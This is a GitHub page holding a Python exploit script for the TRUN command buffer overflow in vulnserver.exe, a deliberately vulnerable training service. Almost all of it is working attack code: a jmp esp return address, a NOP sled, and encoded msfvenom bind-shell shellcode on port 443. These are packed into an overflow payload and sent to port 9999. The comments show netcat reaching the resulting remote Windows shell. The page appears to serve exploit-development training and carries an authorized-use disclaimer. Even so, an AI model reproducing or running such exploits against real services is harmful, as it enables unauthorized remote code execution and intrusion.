-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathexploit-TRUN.py
85 lines (78 loc) · 3.25 KB
/
exploit-TRUN.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/python
#
# November 2017 | github.com/rafaveira3
#
# Exploit vulnserver.exe - TRUN - Buffer Overflow
#
# How I tested it:
# - Windows XP SP2.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - http://sites.google.com/site/lupingreycorner/vulnserver.zip
#
#
# Development Proccess:
# -
#
# PoC:
# Windows XP:
# - Double Click vulnserver.exe
#
# Kali:
# root@kali:~# python exploit-TRUN.py
# root@kali:~# nc -nv 10.10.0.20 443
# (UNKNOWN) [10.10.0.20] 443 (https) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\rafael\Desktop\WORK\vulnserver>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
import socket
import os
import sys
# jmp esp found at 0x625011af - essfunc.fll
ret = "\xaf\x11\x50\x62"
# few nops before shellcode
nops = "\x90"*10
# msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode
# Payload Size: 356 Bytes
shellcode = ""
shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a"
shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20"
shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35"
shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86"
shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87"
shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a"
shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6"
shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92"
shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2"
shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba"
shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f"
shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2"
shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f"
shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47"
shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25"
shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a"
shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf"
shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9"
shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8"
shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48"
shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68"
shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b"
shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee"
shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23"
shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb"
shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1"
shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42"
shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76"
shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4"
shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45"
evil = "A"*2003 + ret + nops + shellcode + "C"*(993-len(shellcode)-len(nops))
data = "TRUN /.:/" + evil
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("10.10.0.20", 9999))
expl.send(data)
expl.close()